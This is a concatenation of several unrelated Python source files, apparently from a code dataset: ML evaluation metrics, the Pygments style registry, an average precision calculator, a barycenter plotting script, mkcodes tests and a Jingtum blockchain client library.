acc_res, thresholds, cuts = acc_operator.compute(labels, pred_scores, normalize)
return acc_res, cuts, thresholds
elif self.eval_type == consts.MULTY:
acc_operator = classification_metric.MultiClassAccuracy()
return acc_operator.compute(labels, pred_scores, normalize)
else:
logging.warning("error:can not find classification type:".format(self.eval_type))
def f1_score(self, labels, pred_scores):
"""
compute f1_score for binary classification result
"""
if self.eval_type == consts.BINARY:
f1_scores, score_threshold, cuts = classification_metric.FScore().compute(labels, pred_scores)
return list(f1_scores), list(cuts), list(score_threshold)
else:
logging.warning('error: f-score metric is for binary classification only')
def confusion_mat(self, labels, pred_scores):
"""
compute confusion matrix
"""
if self.eval_type == consts.BINARY:
sorted_labels, sorted_scores = classification_metric.sort_score_and_label(labels, pred_scores)
score_threshold, cuts = classification_metric.ThresholdCutter.cut_by_step(sorted_scores, steps=0.01)
score_threshold.append(0)
confusion_mat = classification_metric.ConfusionMatrix.compute(sorted_labels, sorted_scores,
score_threshold,
ret=['tp', 'fp', 'fn', 'tn'])
confusion_mat['tp'] = self.__to_int_list(confusion_mat['tp'])
confusion_mat['fp'] = self.__to_int_list(confusion_mat['fp'])
confusion_mat['fn'] = self.__to_int_list(confusion_mat['fn'])
confusion_mat['tn'] = self.__to_int_list(confusion_mat['tn'])
return confusion_mat, cuts, score_threshold
else:
logging.warning('error: f-score metric is for binary classification only')
def psi(self, train_scores, validate_scores, train_labels, validate_labels, debug=False):
"""
Compute the PSI index
Parameters
----------
train_scores: The predict results of train data
validate_scores: The predict results of validate data
train_labels: labels of train set
validate_labels: labels of validate set
debug: print additional info
"""
if self.eval_type == consts.BINARY:
psi_computer = classification_metric.PSI()
psi_scores, total_psi, expected_interval, expected_percentage, actual_interval, actual_percentage, \
train_pos_perc, validate_pos_perc, intervals = psi_computer.compute(train_scores, validate_scores,
debug=debug, str_intervals=True,
round_num=6, train_labels=train_labels
,validate_labels=validate_labels)
len_list = np.array([len(psi_scores), len(expected_interval), len(expected_percentage), len(actual_interval)
, len(actual_percentage), len(intervals)])
assert (len_list == len(psi_scores)).all()
return list(psi_scores), total_psi, self.__to_int_list(expected_interval), list(expected_percentage), \
self.__to_int_list(actual_interval), list(actual_percentage), list(train_pos_perc), \
list(validate_pos_perc), intervals
else:
logging.warning('error: psi metric is for binary classification only')
def quantile_pr(self, labels, pred_scores):
if self.eval_type == consts.BINARY:
p = classification_metric.BiClassPrecision(cut_method='quantile', remove_duplicate=False)
r = classification_metric.BiClassRecall(cut_method='quantile', remove_duplicate=False)
p_scores, score_threshold, cuts = p.compute(labels, pred_scores)
r_scores, score_threshold, cuts = r.compute(labels, pred_scores)
p_scores = list(map(list, np.flip(p_scores, axis=0)))
r_scores = list(map(list, np.flip(r_scores, axis=0)))
score_threshold = list(np.flip(score_threshold))
return p_scores, r_scores, score_threshold
else:
logging.warning('error: pr quantile is for binary classification only')
@staticmethod
def jaccard_similarity_score(labels, pred_labels):
"""
Compute the Jaccard similarity score
Parameters
----------
labels: value list. The labels of data set.
pred_labels: value list. The predict results of model. It should be corresponding to labels each data.
Return
----------
float
A positive floating point value
"""
return clustering_metric.JaccardSimilarityScore().compute(labels, pred_labels)
@staticmethod
def fowlkes_mallows_score(labels, pred_labels):
"""
Compute the Fowlkes Mallows score
Parameters
----------
labels: value list. The labels of data set.
pred_labels: value list. The predict results of model. It should be corresponding to labels each data.
Return
----------
float
A positive floating point value
"""
return clustering_metric.FowlkesMallowsScore().compute(labels, pred_labels)
@staticmethod
def adjusted_rand_score(labels, pred_labels):
"""
Compute the adjusted-rand score
Parameters
----------
labels: value list. The labels of data set.
pred_labels: value list. The predict results of model. It should be corresponding to labels each data.
Return
----------
float
A positive floating point value
"""
return clustering_metric.AdjustedRandScore().compute(labels, pred_labels)
@staticmethod
def davies_bouldin_index(cluster_avg_intra_dist, cluster_inter_dist):
"""
Compute the davies_bouldin_index
Parameters
"""
## process data from evaluation
return clustering_metric.DaviesBouldinIndex().compute(cluster_avg_intra_dist, cluster_inter_dist)
@staticmethod
def contingency_matrix(labels, pred_labels):
"""
"""
return clustering_metric.ContengincyMatrix().compute(labels, pred_labels)
@staticmethod
def distance_measure(cluster_avg_intra_dist, cluster_inter_dist, max_radius):
"""
"""
return clustering_metric.DistanceMeasure().compute(cluster_avg_intra_dist, cluster_inter_dist, max_radius)
|
the-stack_106_15858
|
# -*- coding: utf-8 -*-
"""
pygments.styles
~~~~~~~~~~~~~~~
Contains built-in styles.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.plugin import find_plugin_styles
from pygments.util import ClassNotFound
#: Maps style names to 'submodule::classname'.
STYLE_MAP = {
'default': 'default::DefaultStyle',
'emacs': 'emacs::EmacsStyle',
'friendly': 'friendly::FriendlyStyle',
'colorful': 'colorful::ColorfulStyle',
'autumn': 'autumn::AutumnStyle',
'murphy': 'murphy::MurphyStyle',
'manni': 'manni::ManniStyle',
'monokai': 'monokai::MonokaiStyle',
'perldoc': 'perldoc::PerldocStyle',
'pastie': 'pastie::PastieStyle',
'borland': 'borland::BorlandStyle',
'trac': 'trac::TracStyle',
'native': 'native::NativeStyle',
'fruity': 'fruity::FruityStyle',
'bw': 'bw::BlackWhiteStyle',
'vim': 'vim::VimStyle',
'vs': 'vs::VisualStudioStyle',
'tango': 'tango::TangoStyle',
'rrt': 'rrt::RrtStyle',
'xcode': 'xcode::XcodeStyle',
'igor': 'igor::IgorStyle',
}
def get_style_by_name(name):
if name in STYLE_MAP:
mod, cls = STYLE_MAP[name].split('::')
builtin = "yes"
else:
for found_name, style in find_plugin_styles():
if name == found_name:
return style
# perhaps it got dropped into our styles package
builtin = ""
mod = name
cls = name.title() + "Style"
try:
mod = __import__('pygments.styles.' + mod, None, None, [cls])
except ImportError:
raise ClassNotFound("Could not find style module %r" % mod +
(builtin and ", though it should be builtin") + ".")
try:
return getattr(mod, cls)
except AttributeError:
raise ClassNotFound("Could not find style class %r in style module." % cls)
def get_all_styles():
"""Return an generator for all styles by name,
both builtin and plugin."""
for name in STYLE_MAP:
yield name
for name, _ in find_plugin_styles():
yield name
|
the-stack_106_15859
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Calculate or keep track of the interpolated average precision.
It provides an interface for calculating interpolated average precision for an
entire list or the top-n ranked items. For the definition of the
(non-)interpolated average precision:
http://trec.nist.gov/pubs/trec15/appendices/CE.MEASURES06.pdf
Example usages:
1) Use it as a static function call to directly calculate average precision for
a short ranked list in the memory.
```
import random
p = np.array([random.random() for _ in xrange(10)])
a = np.array([random.choice([0, 1]) for _ in xrange(10)])
ap = average_precision_calculator.AveragePrecisionCalculator.ap(p, a)
```
2) Use it as an object for long ranked list that cannot be stored in memory or
the case where partial predictions can be observed at a time (Tensorflow
predictions). In this case, we first call the function accumulate many times
to process parts of the ranked list. After processing all the parts, we call
peek_interpolated_ap_at_n.
```
p1 = np.array([random.random() for _ in xrange(5)])
a1 = np.array([random.choice([0, 1]) for _ in xrange(5)])
p2 = np.array([random.random() for _ in xrange(5)])
a2 = np.array([random.choice([0, 1]) for _ in xrange(5)])
# interpolated average precision at 10 using 1000 break points
calculator = average_precision_calculator.AveragePrecisionCalculator(10)
calculator.accumulate(p1, a1)
calculator.accumulate(p2, a2)
ap3 = calculator.peek_ap_at_n()
```
"""
import heapq
import random
import numbers
import numpy
class AveragePrecisionCalculator(object):
"""Calculate the average precision and average precision at n."""
def __init__(self, top_n=None):
"""Construct an AveragePrecisionCalculator to calculate average precision.
This class is used to calculate the average precision for a single label.
Args:
top_n: A positive Integer specifying the average precision at n, or
None to use all provided data points.
Raises:
ValueError: An error occurred when the top_n is not a positive integer.
"""
if not ((isinstance(top_n, int) and top_n >= 0) or top_n is None):
raise ValueError("top_n must be a positive integer or None.")
self._top_n = top_n # average precision at n
self._total_positives = 0 # total number of positives have seen
self._heap = [] # max heap of (prediction, actual)
@property
def heap_size(self):
"""Gets the heap size maintained in the class."""
return len(self._heap)
@property
def num_accumulated_positives(self):
"""Gets the number of positive samples that have been accumulated."""
return self._total_positives
def accumulate(self, predictions, actuals, num_positives=None):
"""Accumulate the predictions and their ground truth labels.
After the function call, we may call peek_ap_at_n to actually calculate
the average precision.
Note predictions and actuals must have the same shape.
Args:
predictions: a list storing the prediction scores.
actuals: a list storing the ground truth labels. Any value
larger than 0 will be treated as positives, otherwise as negatives.
num_positives = If the 'predictions' and 'actuals' inputs aren't complete,
then it's possible some true positives were missed in them. In that case,
you can provide 'num_positives' in order to accurately track recall.
Raises:
ValueError: An error occurred when the format of the input is not the
numpy 1-D array or the shape of predictions and actuals does not match.
"""
if len(predictions) != len(actuals):
raise ValueError("the shape of predictions and actuals does not match.")
if not num_positives is None:
if not isinstance(num_positives, numbers.Number) or num_positives < 0:
raise ValueError("'num_positives' was provided but it wan't a nonzero number.")
if not num_positives is None:
self._total_positives += num_positives
else:
self._total_positives += numpy.size(numpy.where(actuals > 0))
topk = self._top_n
heap = self._heap
for i in range(numpy.size(predictions)):
if topk is None or len(heap) < topk:
heapq.heappush(heap, (predictions[i], actuals[i]))
else:
if predictions[i] > heap[0][0]: # heap[0] is the smallest
heapq.heappop(heap)
heapq.heappush(heap, (predictions[i], actuals[i]))
def clear(self):
"""Clear the accumulated predictions."""
self._heap = []
self._total_positives = 0
def peek_ap_at_n(self):
"""Peek the non-interpolated average precision at n.
Returns:
The non-interpolated average precision at n (default 0).
If n is larger than the length of the ranked list,
the average precision will be returned.
"""
if self.heap_size <= 0:
return 0
predlists = numpy.array(list(zip(*self._heap)))
ap = self.ap_at_n(predlists[0],
predlists[1],
n=self._top_n,
total_num_positives=self._total_positives)
return ap
@staticmethod
def ap(predictions, actuals):
"""Calculate the non-interpolated average precision.
Args:
predictions: a numpy 1-D array storing the sparse prediction scores.
actuals: a numpy 1-D array storing the ground truth labels. Any value
larger than 0 will be treated as positives, otherwise as negatives.
Returns:
The non-interpolated average precision at n.
If n is larger than the length of the ranked list,
the average precision will be returned.
Raises:
ValueError: An error occurred when the format of the input is not the
numpy 1-D array or the shape of predictions and actuals does not match.
"""
return AveragePrecisionCalculator.ap_at_n(predictions,
actuals,
n=None)
@staticmethod
def ap_at_n(predictions, actuals, n=20, total_num_positives=None):
"""Calculate the non-interpolated average precision.
Args:
predictions: a numpy 1-D array storing the sparse prediction scores.
actuals: a numpy 1-D array storing the ground truth labels. Any value
larger than 0 will be treated as positives, otherwise as negatives.
n: the top n items to be considered in ap@n.
total_num_positives : (optionally) you can specify the number of total
positive
in the list. If specified, it will be used in calculation.
Returns:
The non-interpolated average precision at n.
If n is larger than the length of the ranked list,
the average precision will be returned.
Raises:
ValueError: An error occurred when
1) the format of the input is not the numpy 1-D array;
2) the shape of predictions and actuals does not match;
3) the input n is not a positive integer.
"""
if len(predictions) != len(actuals):
raise ValueError("the shape of predictions and actuals does not match.")
if n is not None:
if not isinstance(n, int) or n <= 0:
raise ValueError("n must be 'None' or a positive integer."
" It was '%s'." % n)
ap = 0.0
predictions = numpy.array(predictions)
actuals = numpy.array(actuals)
# add a shuffler to avoid overestimating the ap
predictions, actuals = AveragePrecisionCalculator._shuffle(predictions,
actuals)
sortidx = sorted(
range(len(predictions)),
key=lambda k: predictions[k],
reverse=True)
if total_num_positives is None:
numpos = numpy.size(numpy.where(actuals > 0))
else:
numpos = total_num_positives
if numpos == 0:
return 0
if n is not None:
numpos = min(numpos, n)
delta_recall = 1.0 / numpos
poscount = 0.0
# calculate the ap
r = len(sortidx)
if n is not None:
r = min(r, n)
for i in range(r):
if actuals[sortidx[i]] > 0:
poscount += 1
ap += poscount / (i + 1) * delta_recall
return ap
@staticmethod
def _shuffle(predictions, actuals):
random.seed(0)
suffidx = random.sample(range(len(predictions)), len(predictions))
predictions = predictions[suffidx]
actuals = actuals[suffidx]
return predictions, actuals
@staticmethod
def _zero_one_normalize(predictions, epsilon=1e-7):
"""Normalize the predictions to the range between 0.0 and 1.0.
For some predictions like SVM predictions, we need to normalize them before
calculate the interpolated average precision. The normalization will not
change the rank in the original list and thus won't change the average
precision.
Args:
predictions: a numpy 1-D array storing the sparse prediction scores.
epsilon: a small constant to avoid denominator being zero.
Returns:
The normalized prediction.
"""
denominator = numpy.max(predictions) - numpy.min(predictions)
ret = (predictions - numpy.min(predictions)) / numpy.max(denominator,
epsilon)
return ret
|
the-stack_106_15860
|
import numpy as np
import torch
from matplotlib import pyplot as plt
from matplotlib.lines import Line2D
from sinkhorn_barycenters import barycenter
from utils import gengaussians
params = {"legend.fontsize": 18,
"axes.titlesize": 16,
"axes.labelsize": 16,
"xtick.labelsize": 13,
"ytick.labelsize": 13,
"pdf.fonttype": 42}
plt.rcParams.update(params)
if __name__ == "__main__":
seed = 42
rng = np.random.RandomState(seed)
n_hists = 2
masses = np.ones(n_hists)
n_features = 500
epsilons = np.array([100, 200, 500]) / n_features
grid = np.linspace(-5, 5, n_features)
loc = np.array([-3, 3])
std = np.array([0.4, 0.4])
P = gengaussians(grid, n_hists, loc=loc, scale=std) + 1e-10
M = (grid[:, None] - grid[None, :]) ** 2
Pt = torch.tensor(P)
bars = []
bars_div = []
bars_prod = []
tol = 0.001 / n_features
for epsilon in epsilons:
K = np.exp(- M / epsilon)
Kt = torch.tensor(K)
bar = barycenter(Pt, Kt, reference="uniform", tol=tol)
bar_deb = barycenter(Pt, Kt, reference="debiased", tol=tol)
bar_prod = barycenter(Pt, Kt, reference="product", tol=tol)
bars.append(bar)
bars_div.append(bar_deb)
bars_prod.append(bar_prod)
colors = ["darkblue", "salmon", "mediumaquamarine"]
names = [r"$\alpha_{OT^{\mathcal{U}}_{\varepsilon}}$ (IBP)",
r"$\alpha_{OT^{\otimes}_{\varepsilon}}$",
r"$\alpha_{S_{\varepsilon}}$ (proposed)"]
styles = ["-", "-", "-"]
legend = [Line2D([0], [0], color=color,
label=name, linewidth=2, ls=ls)
for color, name, ls in zip(colors, names, styles)]
f, axes = plt.subplots(1, 3, figsize=(9, 3), sharex=True, sharey=True)
for ax, bar, bar_prod, bar_div, eps in zip(axes.ravel(), bars,
bars_prod, bars_div, epsilons):
ax.plot(grid, P, color="k", alpha=0.7)
ax.plot(grid, bar_prod, color="salmon", lw=2, ls=styles[1])
ax.plot(grid, bar, color="darkblue", lw=2, ls=styles[0])
ax.plot(grid, bar_div, color="mediumaquamarine", lw=3, ls=styles[2])
eps = np.round(eps, 2)
ax.set_title(r"$\varepsilon$ = %s" % eps)
ax.set_ylim([0., 0.04])
plt.savefig("fig/gaussians.pdf", tight_layout=True)
plt.figure(figsize=(10, 1))
plt.axis("off")
plt.legend(handles=legend, ncol=3)
# plt.show()
plt.savefig("fig/gaussians-legend.pdf", tight_layout=True)
|
the-stack_106_15862
|
import os
import shutil
import textwrap
import unittest
import subprocess
import click.testing
import mkcodes
class TestBase(unittest.TestCase):
outputfile = 'tests/output/output.py'
def tearDown(self):
shutil.rmtree('tests/output', ignore_errors=True)
@classmethod
def call(cls, *flags, inputfile='tests/data/some.md'):
runner = click.testing.CliRunner()
runner.invoke(mkcodes.main,
['--output', cls.outputfile] + list(flags) + [inputfile])
def assertFileEqual(self, filename, expected):
with open(filename, 'r') as output:
self.assertEqual(output.read(), textwrap.dedent(expected))
class TestMarkdown(TestBase):
def assertOutput(self, expected):
self.assertFileEqual(self.outputfile, expected)
@unittest.skip
def test_markdown_safe(self):
raise NotImplementedError
def test_github_safe(self):
self.call('--github', '--safe')
self.assertOutput("""\
bar = False
backticks = range(5, 7)
""")
def test_markdown_unsafe(self):
self.call('--markdown', '--unsafe')
self.assertOutput("""\
baz = None
""")
def test_github_unsafe(self):
self.call('--github', '--unsafe')
self.assertOutput("""\
foo = True
bar = False
backticks = range(5, 7)
""")
class TestInputs(TestBase):
def assertOutputFileEqual(self, filename, expected):
self.assertFileEqual(os.path.join('tests/output', filename), expected)
@staticmethod
def _output_path_exists(path):
return os.path.exists(os.path.join('tests/output', path))
@classmethod
def call(cls, *args, **kwargs):
super().call('--github', *args, **kwargs)
def test_file(self):
self.call()
self.assertTrue(self._output_path_exists('output.py'))
def test_file_without_code(self):
"""Code files should not be written for markdown files with no code."""
self.call(inputfile='tests/data/nocode.md')
self.assertFalse(self._output_path_exists('nocode.py'))
def test_directory(self):
self.call(inputfile='tests/data')
self.assertTrue(self._output_path_exists('output.py'))
def test_directory_recursive(self):
self.call(
'--output', 'tests/output/{name}.py', '--github', 'tests/data')
self.assertTrue(self._output_path_exists('some.py'))
self.assertTrue(self._output_path_exists('other.py'))
self.assertTrue(self._output_path_exists('nest/deep.py'))
self.assertFalse(self._output_path_exists('not_markdown.py'))
self.assertTrue(self._output_path_exists('nest/more/why.py'))
def test_multiple(self):
self.call(
'--output', 'tests/output/{name}.py', '--github',
'tests/data/some.md', 'tests/data/other.md')
self.assertOutputFileEqual('some.py', """\
bar = False
backticks = range(5, 7)
""")
self.assertOutputFileEqual('other.py', """\
qux = 4
""")
self.assertFalse(self._output_path_exists('nest/deep.py'))
def test_unexistant_output_directory(self):
self.call(
'--output', 'tests/output/unexistant/{name}.py',
'--github', 'tests/data/some.md')
self.assertOutputFileEqual('unexistant/some.py', """\
bar = False
backticks = range(5, 7)
""")
def test_prefixed_deep_blocks(self):
self.call(
'--output', 'tests/output/test_{name}.py', '--github',
'tests/data')
self.assertTrue(self._output_path_exists('test_some.py'))
self.assertTrue(self._output_path_exists('test_other.py'))
self.assertTrue(self._output_path_exists('nest/test_deep.py'))
self.assertTrue(self._output_path_exists('nest/more/test_why.py'))
self.assertTrue(self._output_path_exists('nest/less/test_why.py'))
# Check that mkcodes can actually output a valid test directory.
proc = subprocess.run(
['python3', '-m', 'unittest', 'discover', 'tests/output'],
capture_output=True, text=True)
self.assertIn('Ran 2 tests', proc.stderr)
self.assertIn('OK', proc.stderr)
def test_other_languages(self):
self.call(
'--output', 'tests/output/test_{name}.{ext}',
'--github', 'tests/langdata')
self.assertTrue(self._output_path_exists('test_java.java'))
self.assertTrue(self._output_path_exists('test_csharp.cs'))
self.assertFalse(self._output_path_exists('test_csharp.csharp'))
self.assertTrue(self._output_path_exists('test_multilang.cs'))
self.assertTrue(self._output_path_exists('test_multilang.java'))
self.assertTrue(self._output_path_exists('test_multilang.py'))
self.assertTrue(self._output_path_exists('test_multilang.js'))
self.assertTrue(self._output_path_exists('no_py_tree/test_clean.js'))
self.assertFalse(self._output_path_exists('no_py_tree/__init__.py'))
self.assertTrue(self._output_path_exists('pytree/test_buried.py'))
self.assertTrue(self._output_path_exists('pytree/__init__.py'))
# __init__.py should not be created in the base output directory.
self.assertFalse(self._output_path_exists('__init__.py'))
@unittest.skip
def test_glob(self):
raise NotImplementedError
if __name__ == '__main__':
unittest.main()
|
the-stack_106_15864
|
"""
* Created with PyCharm.
* User: 彭诗杰
* Date: 2018/5/3
* Time: 11:25
* Description: main handler for backend system
* one remote object one server, not many options onfiguration Parameters:
* {
* local_sign: false, // default sign tx in jingtumd
* }
"""
import json
import math
from numbers import Number
from eventemitter import EventEmitter
from jingtum_python_baselib.utils import *
from jingtum_python_baselib.wallet import Wallet
from jingtum_python_lib.config import Config
from jingtum_python_lib.request import Request
from jingtum_python_lib.server import Server, WebSocketServer
from jingtum_python_lib.transaction import RelationTypes, AccountSetTypes, set_clear_flags, OfferTypes, Transaction
from jingtum_python_lib.utils import LRUCache, utils, process_tx, is_number
# LEDGER_OPTIONS = ['closed', 'header', 'current']
"""
* ---------------------- transaction request --------------------
**
* return string if swt amount
* @param amount
* @returns {Amount}
"""
def to_amount(amount):
if amount.__contains__('value') and int(float(amount['value'])) > 100000000000:
return Exception('invalid amount: amount\'s maximum value is 100000000000')
if amount['currency'] == Config.currency:
# return new String(parseInt(Number(amount.value) * 1000000.00))
return str(int(float(amount['value']) * 1000000))
return amount
class Remote:
def __init__(self, local_sign=False):
# self.url = options['server']
self.local_sign = local_sign
self.server = WebSocketServer(self)
self.status = {"ledger_index": 0}
self.requests = {}
self.cache = LRUCache(100) # 100 size,为cache和path设置缓存
self.path = LRUCache(2100) # 2100 size
self.emitter = EventEmitter()
"""
para callback set default to None as nouse now
"""
def connect(self, callback=None):
"""
connect first on every case
:param callback:(error, result)
:return:
"""
if not self.server:
return 'server not ready'
return self.server.connect(callback)
def get_connect_info(self):
"""
get connection info
"""
if not self.server:
return 'server not ready'
data = self.server.socket_open()
if isinstance(data, dict) and data['callback']:
data = json.loads(data['callback'])
if data['status'] == 'success':
return data['result']
else:
return data
def is_connected(self):
"""
check is remote is connected to jingtum
:return:
"""
return self.server.connected
def disconnect(self):
self.server.ws.close()
self.server.connected = False
self.server.opened = False
def handle_message(self, data):
# 此处可能要处理异常情况
data = json.loads(data)
if not data:
return
if data.type == 'ledgerClosed':
self.handle_ledger_closed(data)
elif data.type == 'serverStatus':
self.handle_server_status(data)
elif data.type == 'response':
self.handle_response(data)
elif data.type == 'transaction':
self.handle_transaction(data)
elif data.type == 'path_find':
self.handle_path_find(data)
def handle_ledger_closed(self, data):
"""
update server ledger status
supply data to outside include ledger, reserve and fee
:param data:
:return:
"""
if data.ledger_index > self.status.ledger_index:
self.status.ledger_index = data.ledger_index
self.status.ledger_time = data.ledger_time
self.status.reserve_base = data.reserve_base
self.status.reserve_inc = data.reserve_inc
self.status.fee_base = data.fee_base
self.status.fee_ref = data.fee_ref
self.emitter.emit('ledger_closed', data)
def handle_server_status(self, data):
"""
supply data to outside about server status
:param data:
:return:
"""
self.update_server_status(data)
self.emitter.emit('server_status', data)
def update_server_status(self, data):
self.status.load_base = data.load_base
self.status.load_factor = data.load_factor
if data.pubkey_node:
self.status.pubkey_node = data.pubkey_node
self.status.server_status = data.server_status
online = ~Server.online_states.indexOf(data.server_status)
self.server.set_state('online' if online else 'offline')
def handle_response(self, data):
"""
handle response by every websocket request
:param data:
:return:
"""
req_id = data.id
if isinstance(req_id, Number) or req_id < 0 or req_id > self.requests.__len__():
return
request = self.requests[req_id]
# pass process it when null callback
del self.requests[req_id]
del data.id
# check if data contain server info
if data.result and data.status == 'success' and data.result.server_status:
self.update_server_status(data.result)
# return to callback
if data.status == 'success':
result = request.filter(data.result)
request.callback(None, result)
elif data.status == 'error':
request.callback(data.error_message or data.error_exception)
def handle_transaction(self, data):
"""
handle transaction type response
TODO supply more friendly transaction data
:param data:
:return:
"""
tx = data.transaction.hash
if self.cache.get(tx):
return
self.cache.set(tx, 1)
self.emitter.emit('transactions', data)
def handle_path_find(self, data):
"""
emit path find date to other
:param data:
:return:
"""
self.emitter.emit('path_find', data)
def submit(self, command, data):
"""
request to server and backend
:param command:
:param data:
:param filter:
:return: {'req_id': req_id, 'callback': callback}
"""
result = self.server.send_message(command, data)
self.requests[result['req_id']] = {
'command': command,
'data': data,
# 'filter': filter,
'callback': result['callback']
}
return result
# return result['callback']
def subscribe(self, streams):
request = Request(self, "subscribe", None)
if streams:
request.message['streams'] = streams if isinstance(streams, list) else [streams]
return request
# ---------------------- info request - -------------------
def request_server_info(self):
"""
请求服务器底层信息
request server info
return version, ledger, state and node id
no option is required
:return: {Request}
"""
return Request(self, 'server_info', None)
def request_ledger_closed(self):
"""
获取最新账本信息
request last closed ledger index and hash
:return: {Request}
"""
return Request(self, 'ledger_closed', None)
def request_ledger(self, options):
"""
获取某一账本具体信息
:param options: dict{ledger_index: Number, ledger_hash: hash, string}
:return:
"""
cmd = 'ledger'
filter = True
req = Request(self, cmd, filter)
if not isinstance(options, dict):
req.message['type'] = Exception('invalid options type')
return req
if options.__contains__('ledger_index') and is_number(options['ledger_index']):
req.message['ledger_index'] = int(options['ledger_index'])
elif options.__contains__('ledger_hash') and is_valid_hash(options['ledger_hash']):
req.message['ledger_hash'] = options['ledger_hash']
if 'full' in options.keys() and isinstance(options['full'], bool):
req.message['full'] = options['full']
filter = False
if 'expand' in options.keys() and isinstance(options['expand'], bool):
req.message['expand'] = options['expand']
filter = False
if 'transactions' in options.keys() and isinstance(options['transactions'], bool):
req.message['transactions'] = options['transactions']
filter = False
if 'accounts' in options.keys() and isinstance(options['accounts'], bool):
req.message['accounts'] = options['accounts']
filter = False
return req
def request_tx(self, options):
"""
查询某一交易具体信息
:param options:
:return:
"""
req = Request(self, 'tx', None)
if not isinstance(options, dict):
req.message['type'] = Exception('invalid options type')
return req
if not is_valid_hash(options['hash']):
req.message['hash'] = Exception('invalid tx hash')
return req
req.message['transaction'] = options['hash']
return req
def get_relation_type(self, type):
if type == 'trustline':
return 0
elif type == 'authorize':
return 1
elif type == 'freeze':
return 2
def request_account(self, type, options, req):
"""
:param type:
:param options:
:param req:
:return:
"""
req.command = type
ledger = None
peer = None
limit = None
marker = None
account = options['account']
if 'ledger' in options:
ledger = options['ledger']
if 'peer' in options:
peer = options['peer']
if 'limit' in options:
limit = options['limit']
if 'marker' in options:
marker = options['marker']
if 'type' in options:
req.message['relation_type'] = self.get_relation_type(options['type'])
if account:
if not Wallet.is_valid_address(account):
req.message['account'] = Exception('invalid account')
return req
else:
req.message['account'] = account
req.select_ledger(ledger)
if Wallet.is_valid_address(peer):
req.message['peer'] = peer
if limit:
limit = int(limit)
if limit < 0:
limit = 0
if limit > 1e9:
limit = 1e9
req.message['limit'] = limit
if marker:
req.message['marker'] = marker
return req
def request_account_info(self, options):
"""
请求账号信息
:param options: {account:’xxx’}
:return:
"""
req = Request(self, None, None)
if not isinstance(options, dict):
req.message['type'] = Exception('invalid options type')
return req
return self.request_account('account_info', options, req)
def request_account_tums(self, options):
"""
account tums 请求账号能交易代币
return account supports currency, including
send currency and receive currency
:param options: account(required): the query account
:return:
"""
req = Request(self, None, None)
if not isinstance(options, dict):
req.message['type'] = Exception('invalid options type')
return req
return self.request_account('account_currencies', options, req)
# import RelationTypes src.transaction
def request_account_relations(self, options):
req = Request(self, None, None)
if not isinstance(options, dict):
req.message['type'] = Exception('invalid options type')
if not ~RelationTypes.index(options['type']):
req.message['relation_type'] = Exception('invalid realtion type')
return req
if options['type'] == 'trust':
return self.request_account('account_lines', options, req)
elif options['type'] == 'authorize' or options['type'] == 'freeze':
return self.request_account('account_relation', options, req)
req.message['msg'] = Exception('relation should not go here')
return req
def request_account_offers(self, options):
"""
查询账户挂单
:param options: account(required): the query account
:return:
"""
req = Request(self, None, None)
if not isinstance(options, dict):
req.message['type'] = Exception('invalid options type')
return req
return self.request_account('account_offers', options, req)
def deploy_contract_tx(self, options):
"""
创建部署合约对象
* @param options
* account, required
* amount, required
* payload, required
* @returns {Transaction}
"""
tx = Transaction(self, None)
if not options:
tx.tx_json['obj'] = Exception('invalid options type')
return tx
account = options['account']
amount = options['amount']
payload = options['payload']
if options.__contains__('params'):
params = options['params']
if not Wallet.is_valid_address(account):
tx.tx_json['account'] = Exception('invalid account')
return tx
if math.isnan(amount):
tx.tx_json['amount'] = Exception('invalid amount')
return tx
if not isinstance(payload, str):
tx.tx_json['payload'] = Exception('invalid payload: type error.')
return tx
if 'params' in vars():
if not isinstance(params, list):
tx.tx_json['params'] = Exception('invalid params')
return tx
tx.tx_json['TransactionType'] = 'ConfigContract'
tx.tx_json['Account'] = account
tx.tx_json['Amount'] = amount * 1000000
tx.tx_json['Method'] = 0
tx.tx_json['Payload'] = payload
tx.tx_json['Args'] = []
if 'params' in vars():
for i in params:
obj = dict()
obj['Arg'] = {'Parameter': str_to_hex(i)}
tx.tx_json['Args'].append(obj)
# print(tx.tx_json['Args'])
return tx
def call_contract_tx(self, options):
"""
创建执行合约对象
* @param options
* account, required
* destination, required
* foo, required
* @returns {Transaction}
"""
tx = Transaction(self, None)
if not options:
tx.tx_json['obj'] = Exception('invalid options type')
return tx
account = options['account']
des = options['destination']
foo = options['foo']
if options.__contains__('params'):
params = options['params']
if not Wallet.is_valid_address(account):
tx.tx_json['account'] = Exception('invalid account')
return tx
if not Wallet.is_valid_address(des):
tx.tx_json['des'] = Exception('invalid destination')
return tx
if not isinstance(foo, str):
tx.tx_json['foo'] = Exception('foo must be string')
return tx
if 'params' in vars():
if not isinstance(params, list):
tx.tx_json['params'] = Exception('invalid params')
return tx
tx.tx_json['TransactionType'] = 'ConfigContract'
tx.tx_json['Account'] = account
tx.tx_json['Method'] = 1
tx.tx_json['Destination'] = des
tx.tx_json['ContractMethod'] = str_to_hex(foo)
tx.tx_json['Args'] = []
for i in params:
if not isinstance(i, str):
tx.tx_json['params'] = Exception('params must be string')
return tx
obj = dict()
obj['Arg'] = {'Parameter': str_to_hex(i)}
tx.tx_json['Args'].append(obj)
return tx
def parse_payment(self, data):
if isinstance(data, dict) and data['callback']:
data = json.loads(data['callback'])
if data['status'] == 'success':
return {
'engine_result': data['result']['engine_result'],
'engine_result_code': data['result']['engine_result_code'],
'engine_result_message': data['result']['engine_result_message'],
'tx_blob': data['result']['tx_blob'],
'tx_json': data['result']['tx_json']
}
else:
return data
else:
return data
def parse_contract(self, data):
if isinstance(data, dict) and data['callback']:
data = json.loads(data['callback'])
if data['status'] == 'success':
return {
'ContractState:': data['result']['ContractState'],
'engine_result': data['result']['engine_result'],
'engine_result_code': data['result']['engine_result_code'],
'engine_result_message': data['result']['engine_result_message'],
'tx_blob': data['result']['tx_blob'],
'tx_json': data['result']['tx_json']
}
else:
return data
else:
return data
def parse_transaction(self, data):
if isinstance(data, dict) and data['callback']:
data = data['callback']
else:
return data
data = json.loads(data)
if data['status'] == 'success':
return data['result']
else:
return {
'error': data['error'],
